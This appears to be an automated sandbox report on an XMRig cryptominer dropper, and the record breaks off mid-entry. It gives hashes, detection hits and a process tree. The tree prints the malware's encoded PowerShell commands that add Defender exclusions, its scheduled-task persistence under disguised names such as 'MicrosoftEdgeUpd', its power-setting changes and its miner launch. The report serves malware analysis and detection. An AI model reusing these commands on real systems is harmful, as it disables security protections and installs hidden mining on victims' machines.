xmrig | 0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1

Analysis

max time kernel
300s
max time network
181s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
16/04/2023, 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe
Size

301KB
MD5

b1f5b6125991825cfb4a06104499b3ed
SHA1

c46a5fbbf1f9262fe4d7f08d507ec41de96fc9ae
SHA256

0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1
SHA512

798d1318a82bfaf24f42aaf4fee87c7d148bf9210bb5a889304026b9723520f9972073dbd37ee61f90293e5bba7576911f9a5ef9b5685d56e0ce5fbfc394029c
SSDEEP

6144:ZgKilj8OGsaOzcDLwjaGUxYM8wS3Y3avn4udWglY:ZFit8OGt6cP2ajZPK4ud

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral2/files/0x000600000001af63-1705.dat	family_xmrig
behavioral2/files/0x000600000001af63-1705.dat	xmrig
behavioral2/files/0x000600000001af63-1707.dat	family_xmrig
behavioral2/files/0x000600000001af63-1707.dat	xmrig
behavioral2/memory/4108-1709-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/files/0x000600000001af63-1711.dat	family_xmrig
behavioral2/files/0x000600000001af63-1711.dat	xmrig
behavioral2/memory/2956-1713-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/files/0x000600000001af63-1714.dat	family_xmrig
behavioral2/files/0x000600000001af63-1714.dat	xmrig
behavioral2/files/0x000600000001af63-1715.dat	family_xmrig
behavioral2/files/0x000600000001af63-1715.dat	xmrig
behavioral2/memory/5040-1717-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/files/0x000600000001af63-1719.dat	family_xmrig
behavioral2/files/0x000600000001af63-1719.dat	xmrig
behavioral2/memory/2216-1721-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

Executes dropped EXE 7 IoCs

pid	Process
2188	dllhost.exe
4572	winlogson.exe
4108	winlogson.exe
2956	winlogson.exe
5040	winlogson.exe
2216	winlogson.exe
4368	dllhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4192 set thread context of 3564	4192	0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe	67

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3244	4192	WerFault.exe	65

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2832	schtasks.exe
2940	schtasks.exe
4728	schtasks.exe
3012	schtasks.exe
2108	schtasks.exe
4488	schtasks.exe
4420	schtasks.exe
4004	schtasks.exe
3972	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3564	AppLaunch.exe
4132	powershell.exe
4132	powershell.exe
4132	powershell.exe
3732	powershell.exe
3732	powershell.exe
1844	powershell.exe
1844	powershell.exe
3292	powershell.exe
3292	powershell.exe
4480	powershell.exe
4480	powershell.exe
4544	powershell.exe
4544	powershell.exe
3732	powershell.exe
1844	powershell.exe
4544	powershell.exe
4480	powershell.exe
3292	powershell.exe
3732	powershell.exe
1844	powershell.exe
4544	powershell.exe
3292	powershell.exe
4480	powershell.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe
2188	dllhost.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	3564	AppLaunch.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeShutdownPrivilege	3980	powercfg.exe
Token: SeCreatePagefilePrivilege	3980	powercfg.exe
Token: SeShutdownPrivilege	4512	powercfg.exe
Token: SeCreatePagefilePrivilege	4512	powercfg.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeShutdownPrivilege	4368	powercfg.exe
Token: SeCreatePagefilePrivilege	4368	powercfg.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeShutdownPrivilege	3740	powercfg.exe
Token: SeCreatePagefilePrivilege	3740	powercfg.exe
Token: SeShutdownPrivilege	3704	powercfg.exe
Token: SeCreatePagefilePrivilege	3704	powercfg.exe
Token: SeShutdownPrivilege	3704	powercfg.exe
Token: SeCreatePagefilePrivilege	3704	powercfg.exe
Token: SeDebugPrivilege	2188	dllhost.exe
Token: SeDebugPrivilege	4368	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4192 wrote to memory of 3564	4192	0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe	67
PID 4192 wrote to memory of 3564	4192	0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe	67
PID 4192 wrote to memory of 3564	4192	0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe	67
PID 4192 wrote to memory of 3564	4192	0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe	67
PID 4192 wrote to memory of 3564	4192	0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe	67
PID 3564 wrote to memory of 3296	3564	AppLaunch.exe	71
PID 3564 wrote to memory of 3296	3564	AppLaunch.exe	71
PID 3564 wrote to memory of 3296	3564	AppLaunch.exe	71
PID 3296 wrote to memory of 4132	3296	cmd.exe	73
PID 3296 wrote to memory of 4132	3296	cmd.exe	73
PID 3296 wrote to memory of 4132	3296	cmd.exe	73
PID 3564 wrote to memory of 2188	3564	AppLaunch.exe	74
PID 3564 wrote to memory of 2188	3564	AppLaunch.exe	74
PID 3564 wrote to memory of 2188	3564	AppLaunch.exe	74
PID 3564 wrote to memory of 2148	3564	AppLaunch.exe	97
PID 3564 wrote to memory of 2148	3564	AppLaunch.exe	97
PID 3564 wrote to memory of 2148	3564	AppLaunch.exe	97
PID 3564 wrote to memory of 676	3564	AppLaunch.exe	96
PID 3564 wrote to memory of 676	3564	AppLaunch.exe	96
PID 3564 wrote to memory of 676	3564	AppLaunch.exe	96
PID 3564 wrote to memory of 5028	3564	AppLaunch.exe	95
PID 3564 wrote to memory of 5028	3564	AppLaunch.exe	95
PID 3564 wrote to memory of 5028	3564	AppLaunch.exe	95
PID 3564 wrote to memory of 5044	3564	AppLaunch.exe	94
PID 3564 wrote to memory of 5044	3564	AppLaunch.exe	94
PID 3564 wrote to memory of 5044	3564	AppLaunch.exe	94
PID 3564 wrote to memory of 1648	3564	AppLaunch.exe	93
PID 3564 wrote to memory of 1648	3564	AppLaunch.exe	93
PID 3564 wrote to memory of 1648	3564	AppLaunch.exe	93
PID 3564 wrote to memory of 1896	3564	AppLaunch.exe	92
PID 3564 wrote to memory of 1896	3564	AppLaunch.exe	92
PID 3564 wrote to memory of 1896	3564	AppLaunch.exe	92
PID 3564 wrote to memory of 2304	3564	AppLaunch.exe	91
PID 3564 wrote to memory of 2304	3564	AppLaunch.exe	91
PID 3564 wrote to memory of 2304	3564	AppLaunch.exe	91
PID 3564 wrote to memory of 5068	3564	AppLaunch.exe	85
PID 3564 wrote to memory of 5068	3564	AppLaunch.exe	85
PID 3564 wrote to memory of 5068	3564	AppLaunch.exe	85
PID 3564 wrote to memory of 2220	3564	AppLaunch.exe	84
PID 3564 wrote to memory of 2220	3564	AppLaunch.exe	84
PID 3564 wrote to memory of 2220	3564	AppLaunch.exe	84
PID 3564 wrote to memory of 932	3564	AppLaunch.exe	83
PID 3564 wrote to memory of 932	3564	AppLaunch.exe	83
PID 3564 wrote to memory of 932	3564	AppLaunch.exe	83
PID 3564 wrote to memory of 892	3564	AppLaunch.exe	82
PID 3564 wrote to memory of 892	3564	AppLaunch.exe	82
PID 3564 wrote to memory of 892	3564	AppLaunch.exe	82
PID 3564 wrote to memory of 888	3564	AppLaunch.exe	81
PID 3564 wrote to memory of 888	3564	AppLaunch.exe	81
PID 3564 wrote to memory of 888	3564	AppLaunch.exe	81
PID 3564 wrote to memory of 672	3564	AppLaunch.exe	80
PID 3564 wrote to memory of 672	3564	AppLaunch.exe	80
PID 3564 wrote to memory of 672	3564	AppLaunch.exe	80
PID 3564 wrote to memory of 2264	3564	AppLaunch.exe	75
PID 3564 wrote to memory of 2264	3564	AppLaunch.exe	75
PID 3564 wrote to memory of 2264	3564	AppLaunch.exe	75
PID 2264 wrote to memory of 3980	2264	cmd.exe	103
PID 2264 wrote to memory of 3980	2264	cmd.exe	103
PID 2264 wrote to memory of 3980	2264	cmd.exe	103
PID 2220 wrote to memory of 1844	2220	cmd.exe	104
PID 2220 wrote to memory of 1844	2220	cmd.exe	104
PID 2220 wrote to memory of 1844	2220	cmd.exe	104
PID 892 wrote to memory of 3732	892	cmd.exe	105
PID 892 wrote to memory of 3732	892	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe
"C:\Users\Admin\AppData\Local\Temp\0baf968b2431209d904281476a75b04188751a3eb130231e6bf2cea552ef17d1.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4192
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3564
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAGEAcgBrAE8AbgBpAGgAQQBTACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgBDAGoAdgBDAFoAbwB5ADEAcwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAzAGEAZABtAHoAMwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2AGkAYQBMADEAdgBhAGUATwAjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3296
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAGEAcgBrAE8AbgBpAGgAQQBTACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgBDAGoAdgBDAFoAbwB5ADEAcwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAzAGEAZABtAHoAMwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2AGkAYQBMADEAdgBhAGUATwAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4132
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2188
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:624
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:3872
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4424
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:4572
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4680
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4776
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:4108
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4932
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:404
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:2956
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:2400
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4540
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:5040
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4300
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:3428
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:2216
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo рннЕЮпМAшЪo5ВoX & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2264
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3980
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4512
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4368
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3740
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3704
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjABkELgQ2BEgEHgQ0AEkEUgA5AGkAEAQ3BGkAagAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOQBZADoENABsAHUARwRiADYESwA0BEIEKwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbAAxAE0AOgROBDUAQgRsAEIESgQnBHQARwQlBEIAIwA+ACAAQAAoACAAPAAjAGsAEARCAEwEYgA+BHMAZwAaBEQETgA0BCAESwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJAQ5AEgEIgQ0AEgASARRADIAMQRYAE8ELwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMALwQ3ACsEHQQaBEEAFQRGBHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANABKAEYATgRzAHIAaQB6AG8AHQRtAE0EcgArBCMAPgA="
    3⤵
    PID:672
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjABkELgQ2BEgEHgQ0AEkEUgA5AGkAEAQ3BGkAagAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOQBZADoENABsAHUARwRiADYESwA0BEIEKwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbAAxAE0AOgROBDUAQgRsAEIESgQnBHQARwQlBEIAIwA+ACAAQAAoACAAPAAjAGsAEARCAEwEYgA+BHMAZwAaBEQETgA0BCAESwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJAQ5AEgEIgQ0AEgASARRADIAMQRYAE8ELwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMALwQ3ACsEHQQaBEEAFQRGBHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANABKAEYATgRzAHIAaQB6AG8AHQRtAE0EcgArBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4544
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAGoAHgQfBG0AbQBnACoEMgRDBDQAYgA/BGYAQQA1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABKBCMETQRRAGYAVwBWACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB6ABwEVgA1ADcEUgAlBHEAYQBIBBwERARRAEoEIwA+ACAAQAAoACAAPAAjAHAANABLBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlADIAcQBsACkEVwA5ADUAVwA7BDIEZQBGBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwB3ABsEbAA1AHQAIQRuAHcAOQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2BEYEIwA+AA=="
    3⤵
    PID:888
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAGoAHgQfBG0AbQBnACoEMgRDBDQAYgA/BGYAQQA1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABKBCMETQRRAGYAVwBWACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB6ABwEVgA1ADcEUgAlBHEAYQBIBBwERARRAEoEIwA+ACAAQAAoACAAPAAjAHAANABLBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlADIAcQBsACkEVwA5ADUAVwA7BDIEZQBGBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwB3ABsEbAA1AHQAIQRuAHcAOQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2BEYEIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAFkAIwQ6BHQANQAzABwEIwRuAGQAcgB3AHMARQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4ATQBnACEEUQBEAEgETABrADgATQA4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA0BCoEEQRqAC4EJARNAC8ENQRIABQEQARXAHQAIwA+ACAAQAAoACAAPAAjADAALARWAEcAOwRNAHMAVwAsBDQAHAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJAQ3ADMATwRzABwEZwBuAEkAZgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAdwBMACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjACsESgRlAHMATwAjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:892
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAFkAIwQ6BHQANQAzABwEIwRuAGQAcgB3AHMARQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4ATQBnACEEUQBEAEgETABrADgATQA4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA0BCoEEQRqAC4EJARNAC8ENQRIABQEQARXAHQAIwA+ACAAQAAoACAAPAAjADAALARWAEcAOwRNAHMAVwAsBDQAHAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJAQ3ADMATwRzABwEZwBuAEkAZgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAdwBMACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjACsESgRlAHMATwAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3732
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAFoAMAA1ADEAIgRjADgEQwRCBHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBzABwETQRABCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAyBDYAIwA+ACAAQAAoACAAPAAjAEoAOQB0AEwEMQBjAE8EdABOABkEegBkADgEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAC4EFAQ6BGMANwBLADgEPAQ8BGYAMQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAagBSABYEIwQ0AG8ASAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBDAGsARgBHBGUAWQBLACMAPgA="
    3⤵
    PID:932
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAFoAMAA1ADEAIgRjADgEQwRCBHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBzABwETQRABCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAyBDYAIwA+ACAAQAAoACAAPAAjAEoAOQB0AEwEMQBjAE8EdABOABkEegBkADgEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAC4EFAQ6BGMANwBLADgEPAQ8BGYAMQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAagBSABYEIwQ0AG8ASAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBDAGsARgBHBGUAWQBLACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4480
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjADEEJQR6AEkAUAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAANgQcBCYEMAAmBDQERAByAFMANQQsBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA1BEMEQgRFBEEEPAQtBFIAGAQjAD4AIABAACgAIAA8ACMALAROBDgERgAvBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAYBEEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAE4AJwQ3ABsERwBMBDAAQgAjBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAD0EQgBNAEQEWABGBEwEYwBGAEYEIwA+AA=="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2220
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjADEEJQR6AEkAUAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAANgQcBCYEMAAmBDQERAByAFMANQQsBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA1BEMEQgRFBEEEPAQtBFIAGAQjAD4AIABAACgAIAA8ACMALAROBDgERgAvBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAYBEEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAE4AJwQ3ABsERwBMBDAAQgAjBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAD0EQgBNAEQEWABGBEwEYwBGAEYEIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1844
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo эIvННZ & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo омОщA9ЪТ1ЫэхХхИd
    3⤵
    PID:5068
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4004
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo УjleЗcЭУU & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo I1iЯhеяRyоЩШ
    3⤵
    PID:2304
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4728
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo NжМeТщЭaEПыQyzE & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo MжРбМэМh
    3⤵
    PID:1896
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo 7вДvЧ & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo VmЛп5чфiEsaкДт74яr
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo AETrwХZ & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo цxоHdLпУфaЙ
    3⤵
    PID:5044
  - - C:\Windows\SysWOW64\schtasks.exe
